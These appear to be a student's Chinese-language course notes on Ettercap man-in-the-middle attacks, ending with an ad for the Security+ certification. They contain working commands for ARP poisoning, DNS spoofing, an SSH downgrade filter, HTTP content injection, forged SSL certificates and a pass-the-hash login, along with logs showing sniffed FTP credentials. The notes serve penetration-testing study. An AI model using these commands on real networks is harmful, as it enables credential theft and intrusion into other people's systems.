【安全牛学习笔记】中间人攻击、ARP MITM、中间人攻击、Pass the Hash

中间人攻击                                      

Ettercap                                        

    - 统一的中间人攻击工具                      

    - 转发MAC与本机相同,但IP与本机不同的数据包

    - 支持SSH1SSL中间人攻击                   

模块划分                                        

    - Snifer                                    

    - MITM                                      

    - Filter                                    

    - Log                                       

    - Plugin

中间人攻击                                                

Snifer                                                    

    - 负责数据包转发                                      

    - Unified                                             

      单网卡情况下独立完成三层包转发                      

      始终禁用内核IP_Forward功能                          

    - Bridge                                              

      双网卡网卡的一层MITM模式                            

      可作为IPS过滤数据包                                 

      不可在网卡上使用(透明网桥)                        

MITM                                                      

    - 把流量重定向想到ettercap主机上                      

    - 可以使用其他工具实现MITMettercap之作嗅探和过滤使用

中间人攻击                                    

实现MITM的方法                                

    - ARP                                     

    - ICMP                                    

      ICMP路由重定向,半双工                  

    - DHCP                                    

      修改网关地址,半双工                    

    - Switch Port Stealing                    

      flood目标地址是本机,源地址是受害者的包

      适用于ARP静态绑定的环境                 

    - NDP                                     

      IPv6协议欺骗技术

中间人攻击                                    

2.4以上内核对ARP地址欺骗的约束                

    - 收到非请求的ARP响应包,不更新本地ARP缓存

    - Ettercap适用ARP request包进行攻击       

Solaris不根据ARP包更新本地ARP缓存             

    - Ettercap使用先发ICMP包来更新ARP缓存

中间人攻击                              

用户操作界面                            

    - -T     文本界面                   

    - -G     图形界面                   

    - -C     基于文本的图形界面         

    - -D     后台模式                   

指定目标                                

    - IPv4 : MAC/IPs/Ports              

    - IPv6 : MAC/IPs/IPv6/Ports         

    - /10.0.0.1-5;10.0.1.33/20-25,80,110

oot@k:~# ettercap -T

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:

  eth0 -> 00:0C:29:DB:CD:FC

  fe80::20c:29ff:fedb:cdfc/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.

Privileges dropped to EUID 65534 EGID 65534...

  33 plugins

  42 protocol dissectors

  57 ports monitored

20388 mac vendor fingerprint

1766 tcp OS fingerprint

2182 known services

Lua: no scripts were specified, not starting up!

Randomizing -1 hosts for scanning...

Scanning the whole netmask for -1 hosts...

Fri May 13 22:57:16 2016 [550658]

  fe80::20c:29ff:fedb:cdfc:0 --> ff02::2:0 | FR (0)

0 hosts added to the hosts list...

Starting Unified sniffing...

Text only Interface activated...

Hit 'h' for inline help

Fri May 13 22:57:20 2016 [551628]

  fe80::20c:29ff:fedb:cdfc:0 --> ff02::2:0 | FR (0)

root@k:~# ettercap -G

root@k:~# ettercap -C

root@k:~# ettercap -D

root@k:~# ettercap 00:11:11:11:11:11 /1.1.1.1-10;11/25,80,21 /1.1.1.2/

中间人攻击                                                            ┃

权限                                                                  ┃

   - 需要root权限打开链路层Socket连接,然后使用nobody账号运行       

   - 日志写入目录需要nobody有写入权                                 

   - 修改etter.conf : EC_UID=65534                            

基于伪造证书的SSL MITIM                                               

   - Bridge模式不支持SSL MITM                                      

   - openssl genrsa -out etter.ssl.crt 1024                          

   - openssl req -new-keyetter.ssl.crt -out tmp.csr                  

   - openssl x509 -req -days 1825 -in tmp.csr -signkey etter.ssl.crt 

     -out tmp.new                                                    ┃

   - cat tmp.new>>etrer.ssl.crt                                      

   - rm -f tmp.newtmp.csr

root@k:~# vi /etc/ettercap/etter.conf   //主配置文件

############################################################################

#                                                                          #

#  ettercap -- etter.conf -- configuration file                            #

#                                                                          #

#  Copyright (C) ALoR & NaGA                                               #

#                                                                          #

#  This program is free software; you can redistribute it and/or modify    #

#  it under the terms of the GNU General Public License as published by    #

#  the Free Software Foundation; either version 2 of the License, or       #

#  (at your option) any later version.                                     #

#                                                                          #

#                                                                          #

############################################################################

[privs]

ec_uid = 65534                # nobody is the default

ec_gid = 65534                # nobody is the default

[mitm]

arp_storm_delay = 10          # milliseconds

arp_poison_smart = 0          # boolean

arp_poison_warm_up = 1        # seconds

arp_poison_delay = 10         # seconds

arp_poison_icmp = 1           # boolean

arp_poison_reply = 1          # boolean

arp_poison_request = 0        # boolean

arp_poison_equal_mac = 1      # boolean

dhcp_lease_time = 1800        # seconds

port_steal_delay = 10         # seconds

port_steal_send_delay = 2000  # microseconds

ndp_poison_warm_up = 1        # seconds

ndp_poison_delay = 5          # seconds

ndp_poison_send_delay = 1500  # microseconds

ndp_poison_icmp = 1           # boolean

ndp_poison_equal_mac = 1      # boolean

icmp6_probe_delay = 3         # seconds

[connections]

connection_timeout = 300      # seconds

connection_idle = 5           # seconds

connection_buffer = 10000     # bytes

connect_timeout = 5           # seconds

[stats]

sampling_rate = 50            # number of packets 

[misc]

close_on_eof = 1              # boolean value

store_profiles = 1            # 0 = disabled; 1 = all; 2 = local; 3 = remote

aggressive_dissectors = 1     # boolean value

skip_forwarded_pcks = 1       # boolean value

checksum_check = 0            # boolean value

submit_fingerprint = 0        # boolean valid (set if you want ettercap to submit unknown finger prints)

checksum_warning = 0          # boolean value (valid only if checksum_check is 1)

sniffing_at_startup = 1       # boolean value

#######################################################################

#

# You can specify what DISSECTORS are to be enabled or not...

#

# e.g.:     ftp = 21            enabled on port 21 (tcp is implicit)

#           ftp = 2345          enabled on non standard port

#           ftp = 21,453        enabled on port 21 and 453

#           ftp = 0             disabled

#  NOTE: some dissectors have multiple default ports, if you specify a new

#        one, all the default ports will be overwritten

#dissector                 default port

[dissectors]

ftp = 21                   # tcp    21

ssh = 22                   # tcp    22

telnet = 23                # tcp    23

smtp = 25                  # tcp    25

dns = 53                   # udp    53

dhcp = 67                  # udp    68

http = 80                  # tcp    80

ospf = 89                  # ip     89  (IPPROTO 0x59)

pop3 = 110                 # tcp    110

#portmap = 111              # tcp / udp 

vrrp = 112                 # ip     112 (IPPROTO 0x70)

nntp = 119                 # tcp    119

smb = 139,445              # tcp    139 445

imap = 143,220             # tcp    143 220

snmp = 161                 # udp    161

bgp = 179                  # tcp    179

ldap = 389                 # tcp    389

https = 443                # tcp    443

ssmtp = 465                # tcp    465

rlogin = 512,513           # tcp    512 513

rip = 520                  # udp    520

nntps = 563                # tcp    563

ldaps = 636                # tcp    636

telnets = 992              # tcp    992

imaps = 993                # tcp    993

ircs = 994                 # tcp    993

pop3s = 995                # tcp    995

socks = 1080               # tcp    1080

radius = 1645,1646         # udp    1645 1646

msn = 1863                 # tcp    1863

cvs = 2401                 # tcp    2401

mysql = 3306               # tcp    3306

icq = 5190                 # tcp    5190

ymsg = 5050                # tcp    5050

mdns = 5353                # udp    5353

vnc = 5900,5901,5902,5903  # tcp    5900 5901 5902 5903

x11 = 6000,6001,6002,6003  # tcp    6000 6001 6002 6003

irc = 6666,6667,6668,6669  # tcp    6666 6667 6668 6669

gg = 8074            # tcp    8074

proxy = 8080               # tcp    8080

rcon = 27015,27960         # udp    27015 27960

ppp = 34827                # special case ;) this is the Net Layer code

TN3270 = 23,992            # tcp    23 992

# you can change the colors of the curses GUI.

# here is a list of values:

#  0 Black     4 Blue

#  1 Red       5 Magenta

#  2 Green     6 Cyan

#  3 Yellow    7 White

#

[curses]

color_bg = 0

color_fg = 7 

color_join1 = 2 

color_join2 = 4 

color_border = 7

color_title = 3 

color_focus = 6 

color_menu_bg = 4

color_menu_fg = 6 

color_window_bg = 4 

color_window_fg = 7 

color_selection_bg = 6 

color_selection_fg = 6 

color_error_bg = 1 

color_error_fg = 3 

color_error_border = 3 

#

# This section includes all the configurations that needs a string as a

# parmeter such as the redirect command for SSL mitm attack.

#

[strings]

# the default encoding to be used for the UTF-8 visualization

utf8_encoding = "ISO-8859-1"

# the command used by the remote_browser plugin

remote_browser = "xdg-open http://%host%url"

#####################################

#       redir_command_on/off

#####################################

# you must provide a valid script for your operating system in order to have

# the SSL dissection available

# note that the cleanup script is executed without enough privileges (because

# they are dropped on startup). so you have to either: provide a setuid program

# or set the ec_uid to 0, in order to be sure the cleanup script will be

# executed properly

# NOTE: the script must fit into one line with a maximum of 255 characters

#---------------

#     Linux 

#---------------

# if you use ipchains:

   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:

   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#---------------

#    Mac Os X

#---------------

# quick and dirty way:

   #redir_command_on = "ipfw -q add set %set fwd 127.0.0.1,%rport tcp from any to any %port in via %iface"

   #redir_command_off = "ipfw -q delete set %set"

# a better solution is to use a script that keeps track of the rules interted

# and then deletes them on exit:

 # redir_command_on:

 # ----- cut here -------

 #   #!/bin/sh

 #   if [ -a "/tmp/osx_ipfw_rules" ]; then

 #      ipfw -q add `head -n 1 osx_ipfw_rules` fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 

 #   else

 #      ipfw add fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 | cut -d " " -f 1 >> /tmp/osx_ipfw_rules

 #   fi

 # ----- cut here -------

 # redir_command_off:

 # ----- cut here -------

 #   #!/bin/sh

 #   if [ -a "/tmp/osx_ipfw_rules" ]; then

 #      ipfw -q delete `head -n 1 /tmp/osx_ipfw_rules`

 #      rm -f /tmp/osx_ipfw_rules

 #   fi

 # ----- cut here -------

#---------------

#   FreeBSD

#---------------

# Before OF can be used, make sure the kernel module has been loaded by

# `kldstat | grep pf.ko`. If the rusult is empty, you can load it by

# `kldload pf.ko` or add 'pf_enable="YES"' to the /etc/rc.conf and reboot.

# Check if the PF status is enabled by 

# `pfctl -si | grep Status | awk '{print $2;}'`. If "Disabled", enable it with

# `pfctl -e`.

   #redir_command_on = "(pfctl -sn 2> /dev/null; echo 'rdr pass on %iface inet proto tcp from any to any port %port -> localhost port %rport') | pfctl -f - 2> /dev/null"

   #redir_command_off = "pfctl -Psn 2> /dev/null | grep -v %port | pfctl -f - 2> /dev/null"

#---------------

#   Open BSD

#---------------

# unfortunately the pfctl command does not accepts direct rules adding

# you have to use a script which executed the following command:

 # ----- cut here -------

 #   #!/bin/sh

 #   rdr pass on $1 inet proto tcp from any to any port $2 -> localhost port $3 | pfctl -a sslsniff -f -

 # ----- cut here -------

# it's important to remember that you need "rdr-anchor sslsniff" in your

# pf.conf in the TRANSLATION section.

#redir_command_on = "the_script_described_above %iface %port %rport"

#redir_command_off = "pfctl -a sslsniff -Fn"

# also, if you create a group called "pfusers" and have EC_GID be that group,

# you can do something like:

#     chgrp pfusers /dev/pf

#     chmod g+rw /dev/pf

# such that all users in "pfusers" can run pfctl commands; thus allowing non-root

# execution of redir commands. 

##########

#  EOF   #

##########

ARP MITM                                                                   

字符模式                                                                   

    - ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.2// -F 1.ef -P

      autoadd -w a.cap -l loginfo -L logall -m message                      

图形界面                                                                    

SSL MITM                                                                   

    - vi /etc/ettercap/etter.conf                                           

DNS欺骗                                                                    

    - dns_spoof插件配置文件                                                 

    - vi /etc/ettercap/etter.dns

root@k:~# ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.114// -w a.cap -l loginfo -L logall -m message

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:

  eth0 -> 08:00:27:DB:B2:AF

          192.168.1.110/255.255.255.0

          fe80::a00:27ff:fedb:b2af/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.

Privileges dropped to EUID 0 EGID 0...

  33 plug:ns

  42 protocol dissectors

  57 ports monitored

20388 mac vendor fingerprint

1766 tcp OS fingerprint

2182 known services

Lua: no scripts were specified, not starting up!

Scanning for merged targets (2 hosts)...

* |======================================================>| 100.00%

3 hosts added to the hosts list...

ARP poisoning victims:

  GROUP 1 : 192.168.1.1 14:75:90:21:4F:56

  GROUP 2 : 192.168.1.114 78:92:9C:03:6F:18

Starting Unified sniffing

Text only Interface activated ...

Hit 'h' for inline help

FTP : 74.81.178.167:21 -> USER: user123 PASS: password123

root@k:~# ettercap -T -< arp:remote -i eth0 /192.168.1.1// /192.168.1.114// -w a.cap -l loginfo -L logall.ecp      logall.ecp     logall.ecp.eci    logall.ecp.ecp

root@k:~# gedit /etc/ettercap/etter.conf

root@k:~# gedit /etc/ettercap/etter.dns

#######################################################################

#                                                                          #

#  ettercap -- etter.dns -- host file for dns_spoof plugin                 #

#                                                                          #

#  Copyright (C) ALoR & NaGA                                               #

#                                                                          #

#  This program is free software; you can redistribute it and/or modify    #

#  it under the terms of the GNU General Public License as published by    #

#  the Free Software Foundation; either version 2 of the License, or       #

#  (at your option) any later version.                                     #

#                                                                          #

#######################################################################

#                                                                          #

# Sample hosts file for dns_spoof plugin                                   #

#                                                                          #

# the format is (for A query):                                             #

#   www.myhostname.com A 168.11.22.33                                      #

#   *.foo.com          A 168.44.55.66                                      #

#                                                                          #

# ... for a AAAA query (same hostname allowed):                            #

#   www.myhostname.com AAAA 2001:db8::1                                    #

#   *.foo.com          AAAA 2001:db8::2                                    #

#                                                                          #

# or to skip a protocol family (useful with dual-stack):                   #

#   www.hotmail.com    AAAA ::                                             #

#   www.yahoo.com      A    0.0.0.0                                        #

  

# or for PTR query:                                                        #

#   www.bar.com    PTR 10.0.0.10                                           #

#   www.google.com PTR ::1                                                 #

#  

# or for MX query (either IPv4 or IPv6):                                   #

#    domain.com MX xxx.xxx.xxx.xxx                                         #

#    domain2.com MX xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx                #

#    domain3.com MX xxxx:xxxx::y                                           #

#        

# or for WINS query:                                                       #

#    workgroup WINS 127.0.0.1                                              #

#    PC*       WINS 127.0.0.1                                              #

#                                                                          #

# or for SRV query (either IPv4 or IPv6):                                  #

#    service._tcp|_udp.domain SRV 192.168.1.10:port                        #

#    service._tcp|_udp.domain SRV [2001:db8::3]:port                       #

#                                                                          #

# or for TXT query (value must be wrapped in double quotes):               #

#    google.com TXT "v=spf1 ip4:192.168.0.3/32 ~all"                       #

#                                                                          #

# NOTE: the wildcarded hosts can't be used to poison the PTR requests      #

#       so if you want to reverse poison you have to specify a plain       #

#       host. (look at the www.microsoft.com example)                      #

#                                                                          #

#######################################################################

################################

# microsoft sucks ;)

# redirect it to www.linux.org

#

microsoft.com      A   192.168.1.1

*.microsoft.com    A   162.168.1.1

www.microsoft.com  PTR 192.168.1.1      # Wildcards in PTR are not allowed

##########################################

# no one out there can have our domains...

#

www.alor.org  A 127.0.0.1

www.naga.org  A 127.0.0.1

www.naga.org  AAAA 2001:db8::2

##########################################

# dual stack enabled hosts does not make life easy

# force them back to single stack 

www.ietf.org   A    127.0.0.1

www.ietf.org   AAAA ::

www.example.org  A    0.0.0.0

www.example.org  AAAA ::1

###############################################

# one day we will have our ettercap.org domain

#

www.ettercap.org           A  127.0.0.1

www.ettercap-project.org   A  127.0.0.1

ettercap.sourceforge.net   A  23.235.43.133

www.ettercap.org           PTR ::1

###############################################

# some MX examples

#

alor.org   MX  127.0.0.1

naga.org   MX  127.0.0.1

example.org MX 127.0.0.2

microsoft.com MX 2001:db8::1ce:c01d:bee3

###############################################

# This messes up NetBIOS clients using DNS

# resolutions. I.e. Windows/Samba file sharing.

LAB-PC*  WINS  127.0.0.1

###############################################

# some service discovery examples

xmpp-server._tcp.jabber.org SRV 192.168.1.10:5269     

ldap._udp.mynet.com SRV [2001:db8:c001:beef::1]:389   

###############################################

# little example for TXT records

#

naga.org TXT "v=spf1 ip4:192.168.1.2 ip6:2001:db8:d0b1:beef::2 -all"

# vim:ts=8:noexpandtab

----------------------------------------------------------------------------

ettercap 0.8.2 ----->Plugins----->manage the plugins----->dns_spoof(双击)

root@k:~# ettercap -i eth0 -T -M arp -q /192.168.1.1// /192.168.1.114// -p dns_spoof

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:

  eth0 -> 08:00:27:DB:B2:AF

          192.168.1.110/255.255.255.0

          fe80::a00:27ff:fedb:b2af/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.

Privileges dropped to EUID 0 EGID 0...

  33 plug:ns

  42 protocol dissectors

  57 ports monitored

20388 mac vendor fingerprint

1766 tcp OS fingerprint

2182 known services

Lua: no scripts were specified, not starting up!

Scanning for merged targets (2 hosts)...

* |======================================================>| 100.00%

3 hosts added to the hosts list...

ARP poisoning victims:

  GROUP 1 : 192.168.1.1 14:75:90:21:4F:56

  GROUP 2 : 192.168.1.114 78:92:9C:03:6F:18

Starting Unified sniffing

Text only Interface activated ...

Hit 'h' for inline help

ARP MITM                                                           

Ettercap日志查看                                                    

    - etterlog -p log.eci                   查看获取的密码          

    - etterlog -c log.ecp                   列出Log中的连接         

    - etterlog -c -f /1.1.1.1/ log.ecp                              

    - etterlog -B -n -s -F TCP:1.1.1.1:20:1.1.1.2:1234 log.ecp > aa

                                            选择相应的连接并榨取文件

root@k:~# etterlog -p logall.ect

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Log file version     : 0.8.2

Timestamp            : Thu Mya 5 23:56:43 2016 [619991]

Type                 : LOG_INFO

74091.178.167      TCP 21    USER: user 123        PASS: password123

root@k:~# etterlog -c logall.ecp.ecp

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Log file version     : 0.8.2

Timestamp            : Thu Mya 5 23:56:43 2016 [619991]

Type                 : LOG_INFO

Creating the connection table...

Found 2 connection...

TCP: 192.168.1.114:51700 <--> 74.91.178.167:21

TCP: 192.168.1.114:51788 <--> 74.91.178.167:21

root@k:~# etterlog -c logall.ecp

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Log file version     : 0.8.2

Timestamp            : Thu Mya 5 23:56:43 2016 [619991]

Type                 : LOG_INFO

Creating the connection table...

Found 10 connection...

TCP: 192.168.1.114:51977 <--> 13.67.53.38:443

TCP: 192.168.1.114:51798 <--> 58.250.11.124:8080

TCP: 192.168.1.114:51797 <--> 58.250.11.124:8080

TCP: 192.168.1.114:55285 <--> 124.207.160.106:53

TCP: 192.168.1.114:51796 <--> 119.147.21.204:443

TCP: 192.168.1.114:49327 <--> 124.207.160.106:53

TCP: 192.168.1.114:51795 <--> 74.91.178.167:21

TCP: 192.168.1.114:51791 <--> 74.91.178.167:21

TCP: 192.168.1.114:51794 <--> 14.215.152.238:443

TCP: 192.168.1.114:57885 <--> 224.0.0.252:5355

ARP MITM                                                             

Filter                                                               

    - /usr/share/ettercap/                                           

SSH-2.xx / SSH-1.99 / SSH-1.51                                        

    - etterfilter etter.filter.ssh -o ssh.ef                          

替换HTTP内容                                                          

    - if(ip.proto == TCP && tcp.src == 80){                           

    -     msg("data on TCP 80\n");                                    

    -         replace("img src=","img src=\"http://1.1.1.1/1.gif\"");

    -         replace("IMG src=","img src=\"http://1.1.1.1/1.gif\"");

    -         replace("IMG SRG=","img src=\"http://1.1.1.1/1.gif\"");

    - }

root@k:~# cd /usr/share/ettercap

root@k:/usr/share/ettercap# ls

AUTHORS             etter.fields           etter.filter.pcre  etterlog.dtd

doc                 etter.filter           etter.filter.ssh   etter.mime

ettercap.png        etterfilter.cnt        etterfilter.tbl    etter.services

ettercap-small.png  etter.filter.examples  etter.finger.mac   etter.ssl.crt

ettercap.svg        etter.filter.kill      etter.finger.os    lua

root@k:~# gedit etter.filter.ssh

############################################################################

#                                                                          #

#  ettercap -- etter.filter -- filter source file                          #

#                                                                          #

#  Copyright (C) ALoR & NaGA                                               #

#                                                                          #

#  This program is free software; you can redistribute it and/or modify    #

#  it under the terms of the GNU General Public License as published by    #

#  the Free Software Foundation; either version 2 of the License, or       #

#  (at your option) any later version.                                     #

#                                                                          #

############################################################################

##

#

#   This filter will substitute the SSH server response from SSH-1.99 to

#   SSH-1.51, so if the server supports both ssh1 and ssh2 we will force

#   it to use ssh1... ;)

#   server response :    SSH-2.00   only ssh2 supported

#                        SSH-1.99   both ssh1 and ssh2 supported

#                        SSH-1.51   only ssh1 supported

##

if (ip.proto == TCP) {

   if (tcp.src == 22) {

      if ( replace("SSH-1.99", "SSH-1.51") ) {

         msg("[SSH Filter] SSH downgraded from version 2 to 1\n");

      } else {

         if ( search(DATA.data, "SSH-2.00") ) {

            msg("[SSH Filter] Server supports only SSH version 2\n");

         } else {

            if ( search(DATA.data, "SSH-1.51") ) {

               msg("[SSH Filter] Server already supports only version 1\n");

            }

         }

      }

   } 

}

root@k:~# etterfilter etter.filter.ssh -o ssh.ef

root@k:/usr/share/ettercap#  etterfilter etter.filter.ssh -o ssh.ef

etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team

 14 protocol tables loaded:

DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 

 13 constants loaded:

VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP 

 Parsing source file 'etter.filter.ssh'  done.

 Unfolding the meta-tree  done.

 Converting labels to real offsets  done.

 Writing output to 'ssh.ef'  done.

 -> Script encoded into 16 instructions.

root@k:/usr/share/ettercap# ls

AUTHORS             etter.filter           etterfilter.tbl   etter.ssl.crt

doc                 etterfilter.cnt        etter.finger.mac  lua

ettercap.png        etter.filter.examples  etter.finger.os   ssh.ef

ettercap-small.png  etter.filter.kill      etterlog.dtd

ettercap.svg        etter.filter.pcre      etter.mime

etter.fields        etter.filter.ssh       etter.services

root@k:/usr/share/ettercap# cat ssh.ef

root@k:/usr/share/ettercap# mv ssh.ef /root/

root@k:/usr/share/ettercap# cd

root@k:~# ettercap -Tq -M arp:remote -i eth0 /192.168.1.1// /192.168.1.114// -F ssh.ef

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

Listening on:

  eth0 -> 08:00:27:DB:B2:AF

          192.168.1.110/255.255.255.0

          fe80::a00:27ff:fedb:b2af/64

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.

Privileges dropped to EUID 0 EGID 0...

  33 plug:ns

  42 protocol dissectors

  57 ports monitored

20388 mac vendor fingerprint

1766 tcp OS fingerprint

2182 known services

Lua: no scripts were specified, not starting up!

Scanning for merged targets (2 hosts)...

* |======================================================>| 100.00%

2 hosts added to the hosts list...

ARP poisoning victims:

  GROUP 1 : 192.168.1.1 14:75:90:21:4F:56

  GROUP 2 : 192.168.1.114 78:92:9C:03:6F:18

Starting Unified sniffing

Text only Interface activated ...

Hit 'h' for inline help

中间人攻击                                                        

ICMP                                                   

    - -M icmp:00:11:22:33:44:55/10.0.1(真是网关的MAC/IP)          

DHCP                                                            

    - -M dhcp:192.168.0.30,35,50-60/255.255.255.0/192.168.0.1(DNS)

Port                                                           

    - -M port /1.1.1.1/ /1.1.1.2/                                 

Ndp                                                       

    - -M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/

Pass the Hash (PTH)                               

密码破解耗费时间资源巨大                          

使用密文提交给服务器直接完成身份认证              

NTLM/LM是没有加盐的静态HASH密文                   

企业中使用ghost等工具克隆安装系统                 

pth-winexe -U                                     

w7%aad3b435b51404eeaadd3b435b51404ee:ed1bfaeb3063

716ab7fe2allfaf126d8 //1.1.1.1 cmd

root@k:~# mount /dev/sha2 /mnt

root@k:~# cd /mnt/Windows/System32/config

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?


      牛妹先给大家介绍一下Security+


        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。



你可能感兴趣的:(信息安全)